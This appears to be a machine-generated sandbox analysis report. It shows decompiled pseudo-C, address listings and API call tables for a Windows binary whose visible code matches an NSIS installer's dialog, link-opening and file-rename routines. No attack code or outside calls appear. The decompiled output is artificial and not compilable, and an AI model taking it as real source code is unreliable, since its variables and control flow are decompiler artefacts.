					_t120 =  *0x409274; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x42f040;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403DFB(0x40b);
						while(1) {
							_t35 =  *0x42a46c;
							 *0x409274 =  *0x409274 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409274; // 0xffffffff
							__eflags = _t37 -  *0x42f044;
							if(_t37 ==  *0x42f044) {
								E00401410(1);
							}
							__eflags =  *0x42e7ec;
							if( *0x42e7ec != 0) {
								break;
							}
							__eflags =  *0x409274 -  *0x42f044; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x437000);
							E004059C6(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DAF(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DAF(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DAF(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x42f0ac;
							_t136 = _t47;
							if( *0x42f0ac != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DD1(_t122 & 0x00000002);
							EnableWindow( *0x429448, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x42f0ac;
							if( *0x42f0ac == 0) {
								_push( *0x42a480);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x429448);
							}
							E00403DE4();
							E004059A4(0x42a488, 0x42e820);
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x42a488[lstrlenA(0x42a488)]));
							E004059C6(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x42a488);
							_push(0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x42e7f8);
									 *0x429c58 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x42f020,  *_t132 +  *0x42e800 & 0x0000ffff, _t117,  *(0x409278 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x42e7f8 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DAF(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x42e7f8, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											_push(0);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
											ShowWindow( *0x42e7f8, 8);
											E00403DFB(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x42f0ac - _t65;
								if( *0x42f0ac != _t65) {
									goto L61;
								}
								__eflags =  *0x42f0a0 - _t65;
								if( *0x42f0a0 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e7f8);
						 *0x42f024 =  *0x42f024 & 0x00000000;
						__eflags =  *0x42f024;
						EndDialog(_t117,  *0x429850);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_push(0);
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x42e7f8, 0x40f, 0, 1);
						__eflags =  *0x42e7ec;
						return 0 |  *0x42e7ec == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x42a460, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a460,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E16(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x42e7f8, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x42f0ac;
											if( *0x42f0ac == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x429850 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D88();
												goto L30;
											}
											E00401410(_t134);
											 *0x429850 = _t134;
											goto L25;
										}
										__eflags =  *0x409274;
										if( *0x409274 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409274 -  *0x42f044 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x429448);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x42e7f8);
						 *0x42e7f8 = _a12;
						L58:
						if( *0x42b488 == 0 &&  *0x42e7f8 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x42b488 = 1;
						}
						L61:
						return 0;
					}
				}
			}




























                                                                      0x004038d1
                                                                      0x004038d9
                                                                      0x00403a52
                                                                      0x00403a56
                                                                      0x00403a5a
                                                                      0x00403a5c
                                                                      0x00403a61
                                                                      0x00403a6c
                                                                      0x00403a77
                                                                      0x00403a7c
                                                                      0x00403a7e
                                                                      0x00403a80
                                                                      0x00403a83
                                                                      0x00403a88
                                                                      0x00403a96
                                                                      0x00403aa3
                                                                      0x00403aaa
                                                                      0x00403aaa
                                                                      0x00403aab
                                                                      0x00403aab
                                                                      0x00403ab0
                                                                      0x00403abd
                                                                      0x00403ac3
                                                                      0x00403ac5
                                                                      0x00403b05
                                                                      0x00403b0a
                                                                      0x00403b0f
                                                                      0x00403b0f
                                                                      0x00403b14
                                                                      0x00403b1d
                                                                      0x00403b1f
                                                                      0x00403b24
                                                                      0x00403b2a
                                                                      0x00403b2e
                                                                      0x00403b2e
                                                                      0x00403b33
                                                                      0x00403b3a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403b45
                                                                      0x00403b4b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403b51
                                                                      0x00403b54
                                                                      0x00403b57
                                                                      0x00403b5c
                                                                      0x00403b61
                                                                      0x00403b64
                                                                      0x00403b6a
                                                                      0x00403b6f
                                                                      0x00403b72
                                                                      0x00403b78
                                                                      0x00403b7d
                                                                      0x00403b80
                                                                      0x00403b86
                                                                      0x00403b8e
                                                                      0x00403b94
                                                                      0x00403b9b
                                                                      0x00403b9d
                                                                      0x00403ba4
                                                                      0x00403ba4
                                                                      0x00403ba4
                                                                      0x00403bae
                                                                      0x00403bbd
                                                                      0x00403bc9
                                                                      0x00403bd8
                                                                      0x00403bef
                                                                      0x00403bf1
                                                                      0x00403bf7
                                                                      0x00403c0c
                                                                      0x00403bf9
                                                                      0x00403c02
                                                                      0x00403c04
                                                                      0x00403c04
                                                                      0x00403c12
                                                                      0x00403c22
                                                                      0x00403c27
                                                                      0x00403c32
                                                                      0x00403c33
                                                                      0x00403c3a
                                                                      0x00403c40
                                                                      0x00403c44
                                                                      0x00403c49
                                                                      0x00403c4b
                                                                      0x00000000
                                                                      0x00403c51
                                                                      0x00403c51
                                                                      0x00403c53
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403c59
                                                                      0x00403c5d
                                                                      0x00403c82
                                                                      0x00403c88
                                                                      0x00403c8e
                                                                      0x00403c91
                                                                      0x00403cb7
                                                                      0x00403cbd
                                                                      0x00403cbf
                                                                      0x00403cc4
                                                                      0x00403cca
                                                                      0x00403ccd
                                                                      0x00403cd0
                                                                      0x00403ce7
                                                                      0x00403cf3
                                                                      0x00403d0e
                                                                      0x00403d14
                                                                      0x00403d18
                                                                      0x00403d25
                                                                      0x00403d30
                                                                      0x00403d30
                                                                      0x00403cc4
                                                                      0x00000000
                                                                      0x00403c91
                                                                      0x00403c5f
                                                                      0x00403c65
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403c6b
                                                                      0x00403c71
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403c77
                                                                      0x00403c4b
                                                                      0x00403d3d
                                                                      0x00403d49
                                                                      0x00403d49
                                                                      0x00403d51
                                                                      0x00000000
                                                                      0x00403ac7
                                                                      0x00403ac7
                                                                      0x00403aca
                                                                      0x00403afd
                                                                      0x00403afd
                                                                      0x00403aff
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403aff
                                                                      0x00403acc
                                                                      0x00403ad0
                                                                      0x00403ad5
                                                                      0x00403ad7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403ae7
                                                                      0x00403aef
                                                                      0x00000000
                                                                      0x00403af5
                                                                      0x004038eb
                                                                      0x004038eb
                                                                      0x004038f2
                                                                      0x00403903
                                                                      0x00403903
                                                                      0x0040390c
                                                                      0x00403915
                                                                      0x00403920
                                                                      0x00403920
                                                                      0x0040392c
                                                                      0x00403948
                                                                      0x0040394b
                                                                      0x00403960
                                                                      0x00403963
                                                                      0x00403998
                                                                      0x00403998
                                                                      0x0040399e
                                                                      0x00403a3f
                                                                      0x00000000
                                                                      0x00403a48
                                                                      0x004039a4
                                                                      0x004039b7
                                                                      0x004039b9
                                                                      0x004039bb
                                                                      0x004039d8
                                                                      0x004039db
                                                                      0x004039dd
                                                                      0x004039e2
                                                                      0x004039e5
                                                                      0x004039f4
                                                                      0x004039f7
                                                                      0x00403a2a
                                                                      0x00403a3d
                                                                      0x00000000
                                                                      0x00403a3d
                                                                      0x004039f9
                                                                      0x00403a00
                                                                      0x00403a19
                                                                      0x00403a1e
                                                                      0x00403a20
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403a22
                                                                      0x00403a0e
                                                                      0x00403a0e
                                                                      0x00403a10
                                                                      0x00403a10
                                                                      0x00000000
                                                                      0x00403a10
                                                                      0x00403a03
                                                                      0x00403a08
                                                                      0x00000000
                                                                      0x00403a08
                                                                      0x004039e7
                                                                      0x004039ee
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004039f0
                                                                      0x00000000
                                                                      0x004039f0
                                                                      0x004039df
                                                                      0x00000000
                                                                      0x004039df
                                                                      0x004039c7
                                                                      0x004039ca
                                                                      0x004039d0
                                                                      0x004039d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004039d2
                                                                      0x0040396b
                                                                      0x00403971
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040397d
                                                                      0x00403983
                                                                      0x00403985
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040398b
                                                                      0x00403990
                                                                      0x00000000
                                                                      0x00403990
                                                                      0x00403952
                                                                      0x00000000
                                                                      0x0040392e
                                                                      0x00403934
                                                                      0x0040393e
                                                                      0x00403d57
                                                                      0x00403d5e
                                                                      0x00403d6c
                                                                      0x00403d72
                                                                      0x00403d72
                                                                      0x00403d7c
                                                                      0x00000000
                                                                      0x00403d7c
                                                                      0x0040392c

                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403903
                                                                      • ShowWindow.USER32(?), ref: 00403920
                                                                      • DestroyWindow.USER32 ref: 00403934
                                                                      • SetWindowLongA.USER32 ref: 00403952
                                                                      • IsWindowEnabled.USER32 ref: 0040397D
                                                                      • GetDlgItem.USER32 ref: 004039AB
                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039C7
                                                                      • IsWindowEnabled.USER32(00000000), ref: 004039CA
                                                                      • GetDlgItem.USER32 ref: 00403A72
                                                                      • GetDlgItem.USER32 ref: 00403A7C
                                                                      • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A96
                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AE7
                                                                      • GetDlgItem.USER32 ref: 00403B8E
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403BAE
                                                                      • EnableWindow.USER32(00000000,?), ref: 00403BBD
                                                                      • EnableWindow.USER32(?,?), ref: 00403BD8
                                                                      • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BEF
                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C02
                                                                      • lstrlenA.KERNEL32(0042A488,?,0042A488,0042E820), ref: 00403C2B
                                                                      • SetWindowTextA.USER32(?,0042A488), ref: 00403C3A
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403D6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3950083612-0
                                                                      • Opcode ID: 428ff54097934a11192cdc70c6de24aff26a8f42227571d0b05b4d1f68c54d3d
                                                                      • Instruction ID: df67f1e6a98feb1900587c3b6fb9bf12febe36b0bbe5eaa1fdfdb9a2e9e00487
                                                                      • Opcode Fuzzy Hash: 428ff54097934a11192cdc70c6de24aff26a8f42227571d0b05b4d1f68c54d3d
                                                                      • Instruction Fuzzy Hash: 9FC18071604200AFEB306F21ED45F273AADFB44706F50053AF651B62F2D6799942DB2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403EF7, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204windowstringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 92%
                                                                      			E00403EF7(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a468 =  *0x42a468 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E16(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42dfc0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f024, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f024, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a468 != 0) {
						goto L25;
					} else {
						_t112 =  *0x429c58 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DD1(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404182();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42e7fc - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f058;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EC3;
				E00403DAF(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DAF(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DD1( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DE4(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f028 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x42944c =  *0x42944c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a468 =  *0x42a468 & 0x00000000;
				return 0;
			}

















                                                                      0x00403f07
                                                                      0x0040402d
                                                                      0x00404089
                                                                      0x0040408d
                                                                      0x00404164
                                                                      0x00404166
                                                                      0x00404166
                                                                      0x0040416c
                                                                      0x0040416c
                                                                      0x0040416f
                                                                      0x00000000
                                                                      0x00404176
                                                                      0x0040409b
                                                                      0x0040409d
                                                                      0x004040a7
                                                                      0x004040b2
                                                                      0x004040b5
                                                                      0x004040b8
                                                                      0x004040c3
                                                                      0x004040c6
                                                                      0x004040cd
                                                                      0x004040db
                                                                      0x004040f3
                                                                      0x00404106
                                                                      0x00404116
                                                                      0x00404118
                                                                      0x00404118
                                                                      0x004040cd
                                                                      0x00404122
                                                                      0x00000000
                                                                      0x0040412d
                                                                      0x00404131
                                                                      0x00404142
                                                                      0x00404142
                                                                      0x00404148
                                                                      0x00404156
                                                                      0x00404156
                                                                      0x00000000
                                                                      0x0040415a
                                                                      0x00404122
                                                                      0x00404038
                                                                      0x00000000
                                                                      0x0040404c
                                                                      0x00404052
                                                                      0x00404058
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040407d
                                                                      0x0040407f
                                                                      0x00404084
                                                                      0x00000000
                                                                      0x00404084
                                                                      0x00404038
                                                                      0x00403f0d
                                                                      0x00403f10
                                                                      0x00403f15
                                                                      0x00403f26
                                                                      0x00403f26
                                                                      0x00403f2d
                                                                      0x00403f30
                                                                      0x00403f32
                                                                      0x00403f37
                                                                      0x00403f40
                                                                      0x00403f46
                                                                      0x00403f52
                                                                      0x00403f55
                                                                      0x00403f5e
                                                                      0x00403f63
                                                                      0x00403f66
                                                                      0x00403f6b
                                                                      0x00403f82
                                                                      0x00403f89
                                                                      0x00403f9c
                                                                      0x00403f9f
                                                                      0x00403fb4
                                                                      0x00403fbb
                                                                      0x00403fc0
                                                                      0x00403fc5
                                                                      0x00403fc5
                                                                      0x00403fd4
                                                                      0x00403fe3
                                                                      0x00403fe5
                                                                      0x00403ffb
                                                                      0x0040400a
                                                                      0x0040400c
                                                                      0x00000000

                                                                      APIs
                                                                      • CheckDlgButton.USER32 ref: 00403F82
                                                                      • GetDlgItem.USER32 ref: 00403F96
                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FB4
                                                                      • GetSysColor.USER32(?), ref: 00403FC5
                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FD4
                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FE3
                                                                      • lstrlenA.KERNEL32(?), ref: 00403FED
                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FFB
                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040400A
                                                                      • GetDlgItem.USER32 ref: 0040406D
                                                                      • SendMessageA.USER32(00000000), ref: 00404070
                                                                      • GetDlgItem.USER32 ref: 0040409B
                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040DB
                                                                      • LoadCursorA.USER32 ref: 004040EA
                                                                      • SetCursor.USER32(00000000), ref: 004040F3
                                                                      • ShellExecuteA.SHELL32(0000070B,open,0042DFC0,00000000,00000000,00000001), ref: 00404106
                                                                      • LoadCursorA.USER32 ref: 00404113
                                                                      • SetCursor.USER32(00000000), ref: 00404116
                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404142
                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404156
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: N$open
                                                                      • API String ID: 3615053054-904208323
                                                                      • Opcode ID: 216c02f9549e4cc4fd37bee44d43603ffeb44581a3f740d349d9af80225083aa
                                                                      • Instruction ID: 14551bf79dc9b850c1df5b1ed0c744b43dbef919fb8aabdd5cdf0645a4de93b1
                                                                      • Opcode Fuzzy Hash: 216c02f9549e4cc4fd37bee44d43603ffeb44581a3f740d349d9af80225083aa
                                                                      • Instruction Fuzzy Hash: 8D61AFB1A40209BBEB109F60DC45F6A3B69EB54715F108036FB01BA2D1C7B8A991CF99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004056F7, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 145filememoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 82%
                                                                      			E004056F7() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405CAA("KERNEL32.dll", "MoveFileExA");
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42f0b0 =  *0x42f0b0 + 1;
						return _t20;
					}
				}
				 *0x42c618 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42c090, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42bc90, "%s=%s\r\n", 0x42c618, 0x42c090);
						_t56 = _t55 + 0x10;
						_push( *((intOrPtr*)( *0x42f028 + 0x128)));
						_push(0x42c090);
						E004059C6(_t43, 0x400, 0x42c090);
						_t20 = E00405680(0x42c090, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004055F5(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004055F5(_t26 + 0xa, "\n[");
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405641(_t51 + _t29, 0x42bc90, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E004059A4(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405680(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c618, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                      0x00405705
                                                                      0x0040570c
                                                                      0x00405710
                                                                      0x00405719
                                                                      0x0040571d
                                                                      0x0040585c
                                                                      0x0040585c
                                                                      0x00000000
                                                                      0x0040585c
                                                                      0x0040571d
                                                                      0x00405729
                                                                      0x0040573f
                                                                      0x00405767
                                                                      0x00405772
                                                                      0x00405776
                                                                      0x00405796
                                                                      0x0040579d
                                                                      0x004057a0
                                                                      0x004057a6
                                                                      0x004057a7
                                                                      0x004057b4
                                                                      0x004057b9
                                                                      0x004057be
                                                                      0x004057c2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004057d1
                                                                      0x004057d3
                                                                      0x004057e0
                                                                      0x004057e4
                                                                      0x00405855
                                                                      0x00405856
                                                                      0x00000000
                                                                      0x00405800
                                                                      0x0040580d
                                                                      0x00405872
                                                                      0x00405879
                                                                      0x00405820
                                                                      0x00405820
                                                                      0x00405822
                                                                      0x0040582b
                                                                      0x00405836
                                                                      0x00405848
                                                                      0x0040584f
                                                                      0x00000000
                                                                      0x0040584f
                                                                      0x0040587b
                                                                      0x0040587c
                                                                      0x00405881
                                                                      0x00405883
                                                                      0x00405890
                                                                      0x00405890
                                                                      0x00405894
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405885
                                                                      0x00405885
                                                                      0x00405888
                                                                      0x0040588b
                                                                      0x0040588c
                                                                      0x00000000
                                                                      0x00405885
                                                                      0x00405818
                                                                      0x0040581d
                                                                      0x00000000
                                                                      0x0040581d
                                                                      0x004057e4
                                                                      0x00405741
                                                                      0x0040574c
                                                                      0x00405755
                                                                      0x00405759
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405759
                                                                      0x00405866

                                                                      APIs
                                                                        • Part of subcall function 00405CAA: GetModuleHandleA.KERNEL32(000000F1,0040570A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CAE
                                                                        • Part of subcall function 00405CAA: LoadLibraryA.KERNEL32(000000F1,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CBC
                                                                        • Part of subcall function 00405CAA: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CCB
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 0040574C
                                                                      • GetShortPathNameA.KERNEL32 ref: 00405755
                                                                      • GetShortPathNameA.KERNEL32 ref: 00405772
                                                                      • wsprintfA.USER32 ref: 00405790
                                                                      • GetFileSize.KERNEL32(00000000,00000000,0042C090,C0000000,00000004,0042C090,?,0040548D,?,00000000,000000F1,?), ref: 004057CB
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004057DA
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004057F0
